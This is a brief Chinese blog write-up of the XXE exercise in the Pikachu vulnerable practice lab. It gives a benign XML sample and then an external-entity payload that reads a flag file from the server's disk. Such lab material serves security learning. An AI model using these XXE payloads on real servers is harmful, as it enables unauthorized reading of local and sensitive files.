秀妮_5519

 关注

Pikachu漏洞靶场 XXE(xml外部实体注入漏洞)

秀妮_5519

 关注

阅读 74

2022-04-13

XXE(xml外部实体注入漏洞)

概述

提交正常url编码之后的xml数据,显示正常。

<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY test "test1">
]>
<name>&test;</name>

提交payload,查看服务器上文件:

<?xml version = "1.0"?>
<!DOCTYPE ANY [
	<!ENTITY f SYSTEM "file:///C://flag.txt">
]>
<x>&f;</x>

相关推荐

ivy吖

xxe漏洞--xml外部实体注入漏洞

ivy吖 8 0 0

爱做梦的老巫婆

(vulhub)PHP环境XML外部实体注入漏洞(XXE)

爱做梦的老巫婆 73 0 0

Soy丶sauce

XXE—XML外部实体注入

Soy丶sauce 94 0 0

小黑Neo

PHP环境 XML外部实体注入漏洞

小黑Neo 92 0 0

J简文

XML外部实体注入攻击XXE

J简文 32 0 0

夕颜合欢落

Pikachu XXE漏洞1

夕颜合欢落 71 0 0

佛贝鲁先生

No.18 笔记 | XXE(XML 外部实体注入)漏洞原理、分类、利用及防御整理

佛贝鲁先生 5 0 0

闲嫌咸贤

Pikachu靶场--越权漏洞

闲嫌咸贤 25 0 0

程序猿不脱发2

Pikachu漏洞靶场 ../../(目录遍历)

程序猿不脱发2 88 0 0

乱世小白

Pikachu漏洞靶场 File Inclusion(文件包含漏洞)

乱世小白 78 0 0

精彩评论(0)

0 0 举报